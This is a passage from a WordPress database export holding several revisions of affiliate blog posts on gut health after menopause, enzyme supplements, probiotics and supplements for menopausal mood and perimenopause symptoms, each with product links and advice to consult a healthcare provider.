  11. Probiotics are beneficial bacteria that can enhance gut health. You can find probiotics in fermented foods like yogurt, kefir, sauerkraut, kimchi, and kombucha. Alternatively, consider taking a high-quality probiotic supplement after consulting your healthcare provider.
  12. \n\n\n\n
  13. Choose Prebiotic Foods:
  14. \n\n\n\n
  15. Prebiotics are non-digestible fibers that nourish beneficial gut bacteria. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can support a diverse and healthy gut microbiome.
  16. \n\n\n\n
  17. Minimize Processed Foods and Sugar:
  18. \n\n\n\n
  19. High intake of processed foods and added sugars can negatively affect gut health by promoting the growth of harmful bacteria. Focus on whole, unprocessed foods to support a balanced microbiome.
  20. \n
\n\n\n\n

Manage Stress:

\n\n\n\n
    \n
  • Chronic stress can disrupt the gut-brain connection and impact gut health. Engage in stress-reduction techniques such as meditation, deep breathing, yoga, or mindfulness to support both mental well-being and gut health.
  • \n\n\n\n
  • Regular Physical Activity:
  • \n\n\n\n
  • Exercise has been shown to positively influence gut health by promoting the growth of beneficial bacteria. Aim for regular moderate-intensity activities like walking, swimming, or cycling.
  • \n\n\n\n
  • Limit Alcohol and Caffeine:
  • \n\n\n\n
  • Excessive alcohol and caffeine consumption can irritate the gut lining and disrupt gut balance. Moderation is key to maintaining gut health.
  • \n\n\n\n
  • Avoid Antibiotic Overuse:
  • \n\n\n\n
  • While antibiotics are sometimes necessary, overuse can disturb the gut microbiome. Discuss alternatives and potential probiotic supplementation with your healthcare provider when taking antibiotics.
  • \n\n\n\n
  • Consult a Professional:
  • \n\n\n\n
  • If you\'re experiencing persistent gut issues, consider consulting a registered dietitian or healthcare provider who can offer personalized advice and recommendations.
  • \n
\n\n\n\n

LINK TO THE RECOMMENDED BEST PROBIOTICS TO SUPPORT YOUR GUT HEALTH AFTER MENOPAUSE

\n\n\n\n

\n\n\n\n

Conclusion

\n\n\n\n

Prioritizing gut health after menopause is a valuable investment in your overall well-being. By making mindful dietary choices, incorporating probiotic-rich and prebiotic foods, managing stress, and adopting

\n','Nurse Your Gut Health After Menopause: Essential Strategies','','inherit','closed','closed','','5606-revision-v1','','','2023-10-10 08:02:21','2023-10-10 08:02:21','',5606,'https://tummyrevolution.com/?p=5676',0,'revision','',0),(5678,1,'2023-10-10 08:08:04','2023-10-10 08:08:04','\n

In the quest for optimal health, we often uncover hidden gems from nature that offer remarkable benefits. One such gem is enzyme supplements, which have gained attention for their potential to transform the way our bodies digest and absorb nutrients. In this article, we\'ll delve into the benefits of taking enzyme supplements and how they can contribute to improved digestion, gut health, and overall well-being. To see top 5 recommended Enzyme supplements click here

\n\n\n\n
    \n
  1. Enhanced Digestion
  2. \n
\n\n\n\n

Enzymes are the unsung heroes of digestion, responsible for breaking down the foods we eat into smaller, absorbable molecules. Enzyme supplements offer a helping hand to our digestive system, ensuring that complex carbohydrates, proteins, and fats are properly broken down. This results in reduced discomfort after meals and a smoother digestion process.

\n\n\n\n
    \n
  1. Reduced Digestive Discomfort
  2. \n
\n\n\n\n

If you\'ve ever experienced bloating, gas, or indigestion after eating, enzyme supplements might offer the relief you seek. These supplements can help prevent undigested food from fermenting in the gut, leading to fewer uncomfortable symptoms. Whether you\'re dealing with lactose intolerance or sensitivity to specific foods, enzyme supplements can make a noticeable difference.

\n\n\n\n
    \n
  1. Optimized Nutrient Absorption
  2. \n
\n\n\n\n

Taking enzyme supplements can lead to improved nutrient absorption, allowing your body to extract more goodness from the foods you consume. When nutrients are properly broken down into smaller units, they can be readily absorbed through the intestinal lining, ensuring you get the most out of your meals.

\n\n\n\n
    \n
  1. Balanced Gut Health
  2. \n
\n\n\n\n

A harmonious gut environment is vital for overall well-being. Certain enzyme supplements, such as proteolytic enzymes, can support a healthy gut ecosystem by breaking down potentially harmful proteins. By promoting a balanced gut flora, these enzymes contribute to better digestion, a stronger immune system, and improved gut comfort.

\n\n\n\n
    \n
  1. Reduced Inflammation
  2. \n
\n\n\n\n

Enzymes possess anti-inflammatory properties that can help modulate the body\'s immune response. This benefit is particularly relevant for those dealing with inflammatory conditions. Enzyme supplements can aid in reducing inflammation, supporting the body\'s natural healing processes.

\n\n\n\n
    \n
  1. Support for Active Lifestyles
  2. \n
\n\n\n\n

For athletes and active individuals, enzyme supplements can play a vital role in recovery and performance. Proteolytic enzymes, in particular, aid in muscle repair and reduce post-workout muscle soreness. By facilitating quicker recovery, enzyme supplements can keep you feeling at your best, even after intense exercise.

\n\n\n\n
    \n
  1. Aging Gracefully
  2. \n
\n\n\n\n

As we age, our natural enzyme production may decline, impacting digestion and nutrient absorption. Enzyme supplements can provide a helping hand by ensuring that essential nutrients are properly broken down and absorbed. This can contribute to better energy levels and overall vitality.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

Top rated and recommended enzyme supplements

\n\n\n\n

\n\n\n\n

Enzymedica Digest Gold +ATPro, Maximum Strength Formula 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

NOW Supplements, Super Enzymes, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Physician\'s CHOICE Digestive Enzymes, Powerful Enzymes, Organic Prebiotics & Probiotics for Digestive Health & Gut Health, 60 CT

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra, 90 Capsules

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Enzyme supplements offer a holistic approach to improved digestion, better gut health, and overall wellness. By providing your body with the tools it needs to break down and absorb nutrients effectively, you can experience reduced digestive discomfort, enhanced nutrient absorption, and a healthier gut environment. As with any supplement, it\'s important to consult with a healthcare professional before incorporating enzyme supplements into your routine. With their guidance, you can unlock the benefits of these natural catalysts and embark on a journey to better digestion and a happier, healthier you.

\n','Unveiling the Power of Enzyme Supplements: A Path to Better Digestion and Health','','inherit','closed','closed','','5598-revision-v1','','','2023-10-10 08:08:04','2023-10-10 08:08:04','',5598,'https://tummyrevolution.com/?p=5678',0,'revision','',0),(5679,1,'2023-10-12 09:02:24','2023-10-12 09:02:24','\n
\n

Skip to top 5 Enzyme Supplement recommendations click here

Enzyme supplements are taken for various reasons, and individuals may choose to use them for specific health concerns or to support overall well-being. Here are some common reasons why people consider taking enzyme supplements:

\n\n\n\n
\n\n\n\n

1. Digestive Support:

\n\n\n\n
    \n
  • Digestive Enzyme Deficiency: Individuals with insufficient natural enzyme production may experience digestive issues such as bloating, gas, and indigestion. Enzyme supplements can assist in the breakdown of nutrients, promoting better digestion.
  • \n
\n\n\n\n

2. Food Intolerances:

\n\n\n\n
    \n
  • Lactose Intolerance: For those lacking the enzyme lactase needed to digest lactose, lactase supplements can enhance the digestion of dairy products.
  • \n\n\n\n
  • Gluten Intolerance: Enzyme supplements may aid in breaking down gluten, supporting individuals with gluten intolerance or sensitivity.
  • \n
\n\n\n\n

3. Pancreatic Insufficiency:

\n\n\n\n
    \n
  • Individuals with conditions like pancreatic insufficiency, where the pancreas doesn\'t produce enough digestive enzymes, may benefit from enzyme supplements. These supplements can help in the digestion of fats, proteins, and carbohydrates.
  • \n
\n\n\n\n

4. Anti-Inflammatory Effects:

\n\n\n\n
    \n
  • Some enzymes, particularly proteolytic enzymes, are believed to possess anti-inflammatory properties. People may take these supplements to support joint health, reduce inflammation, and aid in recovery after exercise.
  • \n
\n\n\n\n

5. Energy and Vitality:

\n\n\n\n
    \n
  • Enzymes play a vital role in various metabolic processes. Some individuals believe that enzyme supplements can enhance overall energy levels and vitality by supporting these processes.
  • \n
\n\n\n\n

6. Nutrient Absorption:

\n\n\n\n
    \n
  • Proper digestion is crucial for the absorption of nutrients from food. Enzyme supplements may assist in breaking down food particles, facilitating better absorption of vitamins, minerals, and other essential nutrients.
  • \n
\n\n\n\n

7. Age-Related Decline:

\n\n\n\n
    \n
  • Some people believe that enzyme production decreases with age, impacting digestion. Enzyme supplements are considered by some as a way to compensate for this decline.
  • \n
\n\n\n\n

8. Support for Certain Conditions:

\n\n\n\n
    \n
  • Enzyme supplements are sometimes used as complementary therapy for specific health conditions, such as irritable bowel syndrome (IBS) or inflammatory bowel diseases (IBD). However, scientific evidence supporting their efficacy for these conditions may vary.
  • \n
\n\n\n\n

It\'s essential to consult with a healthcare professional before starting any supplement regimen. While enzyme supplements can be beneficial for some, they may not be necessary or suitable for everyone. Additionally, they should not replace a balanced and varied diet, which is the primary source of essential nutrients.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my links

\n
\n\n\n\n

Top 5 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief for Women and Men, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra - Vegetarian Digestive Enzyme Supplement to Support Protein, Carb, Fiber, and Dairy Digestion* - 90 Capsules

\n\n\n\n\"\"\n\n\n\n

NOW Supplements - Super Enzymes, Formulated with Bromelain, Ox Bile, Pancreatin and Papain,180 Capsules

\n\n\n\n\"\"\n\n\n\n


Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

\n

','Reasons to Consider Enzyme Supplements and Top 5 Recommendations','','publish','open','open','','reasons-to-consider-enzyme-supplements-and-top-5-recommendations','','','2023-10-12 09:02:26','2023-10-12 09:02:26','',0,'https://tummyrevolution.com/?p=5679',0,'post','',0),(5682,3,'2023-10-10 08:26:49','2023-10-10 08:26:49','\n

Women transition through menopause, they experience a range of physical and hormonal changes that can impact various aspects of their health, including gut health. Maintaining a balanced and healthy gut becomes even more crucial during this phase, as it can help alleviate digestive issues and contribute to overall well-being. In this blog, we\'ll explore the connection between menopause and gut health and provide actionable strategies to improve and maintain gut health post-menopause.

\n\n\n\n

The Menopause-Gut Health Connection
The gut microbiome plays a vital role in digestion, nutrient absorption, immune function, and even mood regulation. During menopause, hormonal fluctuations can disrupt the delicate balance of the gut microbiota, potentially leading to digestive problems such as bloating, constipation, and increased gas. Additionally, shifts in hormones can influence gut sensitivity, potentially exacerbating conditions like irritable bowel syndrome (IBS).

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

Strategies to Improve Gut health After Menopause

\n\n\n\n
    \n
  1. Prioritize Fiber-Rich Foods:
  2. \n\n\n\n
  3. Include a variety of fiber-rich foods such as whole grains, fruits, vegetables, legumes, and nuts in your diet. Fiber promotes regular bowel movements, supports the growth of beneficial gut bacteria, and helps maintain a healthy gut lining.
  4. \n\n\n\n
  5. Stay Hydrated:
  6. \n\n\n\n
  7. Drinking an adequate amount of water supports healthy digestion, prevents constipation, and aids in the absorption of nutrients. Aim for at least 8 glasses of water per day.
  8. \n\n\n\n
  9. Incorporate Probiotics:
  10. \n\n\n\n
  11. Probiotics are beneficial bacteria that can enhance gut health. You can find probiotics in fermented foods like yogurt, kefir, sauerkraut, kimchi, and kombucha. Alternatively, consider taking a high-quality probiotic supplement after consulting your healthcare provider.
  12. \n\n\n\n
  13. Choose Prebiotic Foods:
  14. \n\n\n\n
  15. Prebiotics are non-digestible fibers that nourish beneficial gut bacteria. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can support a diverse and healthy gut microbiome.
  16. \n\n\n\n
  17. Minimize Processed Foods and Sugar:
  18. \n\n\n\n
  19. High intake of processed foods and added sugars can negatively affect gut health by promoting the growth of harmful bacteria. Focus on whole, unprocessed foods to support a balanced microbiome.
  20. \n
\n\n\n\n

Manage Stress:

\n\n\n\n
    \n
  • Chronic stress can disrupt the gut-brain connection and impact gut health. Engage in stress-reduction techniques such as meditation, deep breathing, yoga, or mindfulness to support both mental well-being and gut health.
  • \n\n\n\n
  • Regular Physical Activity:
  • \n\n\n\n
  • Exercise has been shown to positively influence gut health by promoting the growth of beneficial bacteria. Aim for regular moderate-intensity activities like walking, swimming, or cycling.
  • \n\n\n\n
  • Limit Alcohol and Caffeine:
  • \n\n\n\n
  • Excessive alcohol and caffeine consumption can irritate the gut lining and disrupt gut balance. Moderation is key to maintaining gut health.
  • \n\n\n\n
  • Avoid Antibiotic Overuse:
  • \n\n\n\n
  • While antibiotics are sometimes necessary, overuse can disturb the gut microbiome. Discuss alternatives and potential probiotic supplementation with your healthcare provider when taking antibiotics.
  • \n\n\n\n
  • Consult a Professional:
  • \n\n\n\n
  • If you\'re experiencing persistent gut issues, consider consulting a registered dietitian or healthcare provider who can offer personalized advice and recommendations.
  • \n
\n\n\n\n

LINK TO THE RECOMMENDED BEST PROBIOTICS TO SUPPORT YOUR GUT HEALTH AFTER MENOPAUSE

\n\n\n\n

\n\n\n\n

Conclusion

\n\n\n\n

Prioritizing gut health after menopause is a valuable investment in your overall well-being. By making mindful dietary choices, incorporating probiotic-rich and prebiotic foods, managing stress, and adopting

\n','Nurse Your Gut Health After Menopause: Essential Strategies','','inherit','closed','closed','','5606-revision-v1','','','2023-10-10 08:26:49','2023-10-10 08:26:49','',5606,'https://tummyrevolution.com/?p=5682',0,'revision','',0),(5681,3,'2023-10-10 08:22:00','2023-10-10 08:22:00','\n

Menopause is a natural phase in a woman\'s life that marks the end of her reproductive years. While it is a significant transition, it can also bring about a range of physical and emotional symptoms, including depression. The hormonal changes that occur during menopause can contribute to mood swings and feelings of sadness or hopelessness. While there are various treatments available, some women turn to supplements as a complementary approach to managing their mental health during this challenging time.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

In this blog supplement, we\'ll explore some of the supplements that may help cope with depression during menopause and discuss their potential benefits.

\n\n\n\n

St. John\'s Wort

\n\n\n\n

St. John\'s Wort is a popular herbal remedy that has been used for centuries to treat mood disorders, including depression. Some studies suggest that it may be effective in alleviating mild to moderate depression symptoms. It is believed to work by increasing the levels of certain neurotransmitters in the brain, such as serotonin, which play a role in regulating mood.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n\n\n

Omega-3 Fatty Acids

\n\n\n\n

Omega-3 fatty acids, found in fatty fish like salmon, flaxseeds, and walnuts, are known for their potential to support mental health. Research has shown that omega-3s can help reduce symptoms of depression and improve mood by reducing inflammation in the brain and supporting healthy brain function. Incorporating more omega-3-rich foods into your diet or taking fish oil supplements may be beneficial during menopause.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Vitamin D

\n\n\n\n

Vitamin D is sometimes called the \"sunshine vitamin\" because your skin produces it when exposed to sunlight. Low vitamin D levels have been associated with an increased risk of depression. Since menopausal women are often at risk for vitamin D deficiency due to reduced sun exposure and age-related changes in metabolism, taking a vitamin D supplement may help support both bone health and mood.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

B Vitamins

\n\n\n\n

B vitamins, particularly B6, B9 (folic acid), and B12, are essential for brain health and the production of neurotransmitters. Some studies suggest that deficiencies in these vitamins can contribute to depression and mood disturbances. While it\'s always best to get your nutrients from a balanced diet, if you have concerns about your B vitamin intake, supplements may be considered.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Black Cohosh

\n\n\n\n

Black cohosh is an herbal remedy that has been used by some women to manage menopausal symptoms, including mood swings and hot flashes. While more research is needed to confirm its effectiveness, some women have reported improvements in mood and emotional stability when using black cohosh supplements.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Ashwagandha

\n\n\n\n

Ashwagandha is an adaptogenic herb known for its stress-reducing properties. It may help manage symptoms of depression and anxiety by modulating the body\'s response to stress and supporting a balanced mood. While it may not directly address menopausal symptoms, it can contribute to overall emotional well-being.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Summary

\n\n\n\n

Supplements can be a helpful addition to your overall approach to managing depression during menopause, but they should not replace professional medical advice or treatment. 

\n\n\n\n

Before starting any supplement regimen, it\'s essential to consult with a healthcare provider who can evaluate your specific needs and recommend the most appropriate options. Additionally, remember that a healthy lifestyle, including regular exercise, a balanced diet, and stress management techniques, can also play a significant role in managing depression during menopause. Supplements, when used wisely and in conjunction with other strategies, can be a valuable tool in supporting your mental and emotional well-being during this transformative phase of life.

\n','Coping with Depression During Menopause: The Role of Supplements','','inherit','closed','closed','','5519-revision-v1','','','2023-10-10 08:22:00','2023-10-10 08:22:00','',5519,'https://tummyrevolution.com/?p=5681',0,'revision','',0),(5680,3,'2023-10-10 08:21:26','2023-10-10 08:21:26','\n

Menopause is a natural phase in a woman\'s life that marks the end of her reproductive years. While it is a significant transition, it can also bring about a range of physical and emotional symptoms, including depression. The hormonal changes that occur during menopause can contribute to mood swings and feelings of sadness or hopelessness. While there are various treatments available, some women turn to supplements as a complementary approach to managing their mental health during this challenging time.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to sign make a purchase using my link.

\n\n\n\n

In this blog supplement, we\'ll explore some of the supplements that may help cope with depression during menopause and discuss their potential benefits.

\n\n\n\n

St. John\'s Wort

\n\n\n\n

St. John\'s Wort is a popular herbal remedy that has been used for centuries to treat mood disorders, including depression. Some studies suggest that it may be effective in alleviating mild to moderate depression symptoms. It is believed to work by increasing the levels of certain neurotransmitters in the brain, such as serotonin, which play a role in regulating mood.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n\n\n

Omega-3 Fatty Acids

\n\n\n\n

Omega-3 fatty acids, found in fatty fish like salmon, flaxseeds, and walnuts, are known for their potential to support mental health. Research has shown that omega-3s can help reduce symptoms of depression and improve mood by reducing inflammation in the brain and supporting healthy brain function. Incorporating more omega-3-rich foods into your diet or taking fish oil supplements may be beneficial during menopause.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Vitamin D

\n\n\n\n

Vitamin D is sometimes called the \"sunshine vitamin\" because your skin produces it when exposed to sunlight. Low vitamin D levels have been associated with an increased risk of depression. Since menopausal women are often at risk for vitamin D deficiency due to reduced sun exposure and age-related changes in metabolism, taking a vitamin D supplement may help support both bone health and mood.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

B Vitamins

\n\n\n\n

B vitamins, particularly B6, B9 (folic acid), and B12, are essential for brain health and the production of neurotransmitters. Some studies suggest that deficiencies in these vitamins can contribute to depression and mood disturbances. While it\'s always best to get your nutrients from a balanced diet, if you have concerns about your B vitamin intake, supplements may be considered.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Black Cohosh

\n\n\n\n

Black cohosh is an herbal remedy that has been used by some women to manage menopausal symptoms, including mood swings and hot flashes. While more research is needed to confirm its effectiveness, some women have reported improvements in mood and emotional stability when using black cohosh supplements.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Ashwagandha

\n\n\n\n

Ashwagandha is an adaptogenic herb known for its stress-reducing properties. It may help manage symptoms of depression and anxiety by modulating the body\'s response to stress and supporting a balanced mood. While it may not directly address menopausal symptoms, it can contribute to overall emotional well-being.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Summary

\n\n\n\n

Supplements can be a helpful addition to your overall approach to managing depression during menopause, but they should not replace professional medical advice or treatment. 

\n\n\n\n

Before starting any supplement regimen, it\'s essential to consult with a healthcare provider who can evaluate your specific needs and recommend the most appropriate options. Additionally, remember that a healthy lifestyle, including regular exercise, a balanced diet, and stress management techniques, can also play a significant role in managing depression during menopause. Supplements, when used wisely and in conjunction with other strategies, can be a valuable tool in supporting your mental and emotional well-being during this transformative phase of life.

\n','Coping with Depression During Menopause: The Role of Supplements','','inherit','closed','closed','','5519-revision-v1','','','2023-10-10 08:21:26','2023-10-10 08:21:26','',5519,'https://tummyrevolution.com/?p=5680',0,'revision','',0),(5683,3,'2023-10-10 08:27:40','2023-10-10 08:27:40','\n

Gut health is important for people of all ages, but it becomes particularly crucial after menopause due to changes in hormone levels that can affect digestion and overall well-being. Probiotics can be a helpful addition to your diet to support gut health during and after menopause. However, it\'s important to note that the effectiveness of specific probiotics can vary from person to person, so what works best for one individual may not be the same for another.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

That said, here are some probiotic strains and foods that may help support gut health after menopause:

\n\n\n\n

Lactobacillus Acidophilus: This probiotic strain is well-known for its ability to maintain a healthy balance of beneficial bacteria in the gut. It can be found in yogurt and other fermented dairy products.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Bifidobacterium: Various species of Bifidobacterium, such as Bifidobacterium bifidum and Bifidobacterium longum, are associated with digestive health and may help alleviate common digestive issues that can occur after menopause.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Rhamnosus: This strain is believed to help improve gut health and may be particularly beneficial for women experiencing digestive discomfort during menopause.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n


Lactobacillus Casei: Known for its ability to support the immune system and promote digestive health, this strain is often found in yogurt and fermented foods.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Saccharomyces Boulardii: This beneficial yeast can help support a healthy gut microbiome and may be especially useful if you\'re prone to digestive issues.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Fermented Foods: In addition to probiotic supplements, incorporating fermented foods like kimchi, sauerkraut, kefir, and kombucha into your diet can provide a natural source of probiotics to support gut health.

\n\n\n\n

Prebiotic Foods: Prebiotics are non-digestible fibers that feed the beneficial bacteria in your gut. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can complement your probiotic intake.

\n\n\n\n

When choosing probiotic supplements, it\'s essential to look for products that contain these specific strains or a combination of them. Additionally, ensure that the supplement provides an adequate number of live cultures (CFUs) to be effective. Consult with a healthcare professional before starting any new supplement regimen, as they can provide personalized recommendations based on your health needs and any specific digestive issues you may be experiencing.

\n\n\n\n

Summary

\n\n\n\n

Maintaining good gut health after menopause is important for overall well-being. Probiotic-rich foods and supplements can be beneficial, but individual responses may vary. A balanced diet, rich in fiber and low in processed foods, is also crucial for supporting a healthy gut during and after menopause.

\n','The Best Probiotics to Support Your Gut Health After Menopause','','inherit','closed','closed','','5586-revision-v1','','','2023-10-10 08:27:40','2023-10-10 08:27:40','',5586,'https://tummyrevolution.com/?p=5683',0,'revision','',0),(5684,3,'2023-10-10 08:33:56','2023-10-10 08:33:56','\n

Menopause is a significant milestone in a woman\'s life, marked by the cessation of menstruation and hormonal changes. While menopause brings about various changes in the body, including hot flashes and mood swings, it also has an impact on gut health. Many post-menopausal women may experience digestive issues, such as bloating, constipation, and a weakened immune system. Probiotics can be a valuable addition to the diet of post-menopausal women, offering numerous benefits for gut health and overall well-being. In this blog post, we will explore the best probiotics for post-menopausal women and how they can help maintain a healthy digestive system.

\n\n\n\n

Understanding Probiotics
Before delving into the best probiotics for post-menopausal women, it\'s important to understand what probiotics are. Probiotics are live microorganisms, usually bacteria or yeast, that are beneficial for your health, especially your digestive system. They are often referred to as \"good\" or \"friendly\" bacteria because they help maintain a balanced gut microbiome, which is essential for digestion and overall health.

\n\n\n\n

The Impact of Menopause on Gut Health
Menopause can bring about hormonal changes that affect the composition of the gut microbiome. These changes can lead to an imbalance in the gut bacteria, potentially causing digestive issues and compromising the immune system. Common gastrointestinal problems that post-menopausal women may experience include:
Constipation
Bloating
Diarrhea
Gut inflammation
Weakened immune system
Choosing the Right Probiotics

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

BEST PROBIOTICS FOR POST-MENOPAUSAL WOMAN
Here are some of the best probiotics for post-menopausal women:

\n\n\n\n

Lactobacillus Acidophilus: This strain is known for its ability to support digestive health and alleviate symptoms like bloating and constipation.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

\n\n\n\n

Bifidobacterium Lactis: Bifidobacterium lactis may help boost the immune system and improve overall gut health.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Rhamnosus: This strain can help with diarrhea and may also have mood-boosting effects.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Plantarum: It is known for its anti-inflammatory properties and may help reduce gut inflammation.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Saccharomyces Boulardii: This yeast-based probiotic can help with diarrhea and gut infections.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Summary:

\n\n\n\n

Maintaining gut health is crucial for post-menopausal women to minimize digestive issues and support overall well-being. Probiotics offer a natural and effective way to achieve this. By selecting the right probiotic strains and consulting with a healthcare provider, post-menopausal women can optimize their gut health and enjoy the benefits of a balanced microbiome. Remember that consistency is key when taking probiotics, and it may take some time to see noticeable improvements in gut health.

\n\n\n\n

\n','Best Probiotics for Post-Menopausal Women: A Guide to Gut Health','','inherit','closed','closed','','5513-revision-v1','','','2023-10-10 08:33:56','2023-10-10 08:33:56','',5513,'https://tummyrevolution.com/?p=5684',0,'revision','',0),(5685,3,'2023-10-10 08:34:58','2023-10-10 08:34:58','\n

Perimenopause is a natural phase in a woman\'s life that typically occurs in her 40s or early 50s, leading up to menopause. During this transitional period, hormonal fluctuations can cause a variety of physical and emotional symptoms, such as hot flashes, mood swings, and sleep disturbances. While these changes are a normal part of aging, they can sometimes be challenging to navigate. Thankfully, there are various perimenopause supplements for women that can help alleviate these symptoms and promote overall well-being.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

In this comprehensive guide, we\'ll explore some of the best perimenopause supplements to consider.

\n\n\n\n

1.Black Cohosh
Black cohosh is a popular herbal remedy for managing perimenopausal symptoms. It is believed to help regulate hormone levels, particularly estrogen, which can decline during perimenopause. Studies have shown that black cohosh may be effective in reducing hot flashes, night sweats, and mood swings. It is available in various forms, including capsules, tablets, and tinctures.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

2.Soy Isoflavones
Soy isoflavones are natural compounds found in soybeans and soy products. These compounds have a chemical structure similar to estrogen, making them known as phytoestrogens. Phytoestrogens can help balance hormone levels in the body, potentially reducing the severity of hot flashes and other menopausal symptoms. Women who include soy-based foods or supplements in their diet may experience relief from perimenopausal symptoms.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

3.Evening Primrose Oil
Evening primrose oil is derived from the seeds of the evening primrose plant and is rich in gamma-linolenic acid (GLA). GLA is an essential fatty acid that can help regulate hormone production and reduce inflammation. Many women find that taking evening primrose oil supplements can improve skin health, alleviate breast tenderness, and reduce mood swings.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

4. Vitamin D
Vitamin D is essential for overall health, and it plays a crucial role in bone health and immune function. During perimenopause and menopause, the risk of osteoporosis increases due to declining estrogen levels. Supplementing with vitamin D can help maintain strong bones and reduce the risk of fractures. Additionally, vitamin D may also contribute to better mood and cognitive function.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

5.Calcium and Magnesium
As estrogen levels decrease during perimenopause, the body\'s ability to absorb calcium from food diminishes. This can lead to a higher risk of bone loss and osteoporosis. Calcium and magnesium supplements can help maintain bone density and reduce the risk of fractures. These minerals are also beneficial for muscle function and may help with sleep disturbances and muscle cramps.

\n\n\n\n

Lint to Recommended Product

\n\n\n\n\"\"\n\n\n\n

6.B Vitamins
B vitamins, including B6 and B12, are essential for maintaining energy levels and supporting overall well-being. They play a role in regulating mood and reducing stress and anxiety, which are common perimenopausal symptoms. B vitamin supplements can help combat fatigue and enhance mental clarity during this transitional phase.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

7.Omega-3 Fatty Acids
Omega-3 fatty acids, found in fish oil supplements, are known for their anti-inflammatory properties. They can help alleviate joint pain, reduce mood swings, and support cardiovascular health. Omega-3 supplements may also contribute to healthier skin and hair.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

8.Probiotics
Gut health is closely linked to overall well-being, and during perimenopause, hormonal fluctuations can sometimes disrupt the gut microbiome. Probiotic supplements can help restore and maintain a healthy balance of gut bacteria, potentially reducing bloating, digestive issues, and immune system challenges.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Perimenopause is a natural phase in a woman\'s life, but it doesn\'t have to be a time of discomfort and distress. These perimenopause supplements for women can provide relief from a wide range of symptoms, allowing you to navigate this transitional phase with greater ease and confidence. However, it\'s important to consult with a healthcare provider before adding any new supplements to your routine, as individual needs and responses may vary. In combination with a healthy lifestyle, these supplements can contribute to a smoother perimenopausal journey, helping you embrace the changes that come with this transformative phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','Perimenopause Supplements for Women: A Comprehensive Guide','','inherit','closed','closed','','5473-revision-v1','','','2023-10-10 08:34:58','2023-10-10 08:34:58','',5473,'https://tummyrevolution.com/?p=5685',0,'revision','',0),(5753,1,'2023-10-12 09:01:20','2023-10-12 09:01:20','\n
\n

Skip to top 5 Enzyme Supplement recommendations click here

Enzyme supplements are taken for various reasons, and individuals may choose to use them for specific health concerns or to support overall well-being. Here are some common reasons why people consider taking enzyme supplements:

\n\n\n\n
\n\n\n\n

1. Digestive Support:

\n\n\n\n
    \n
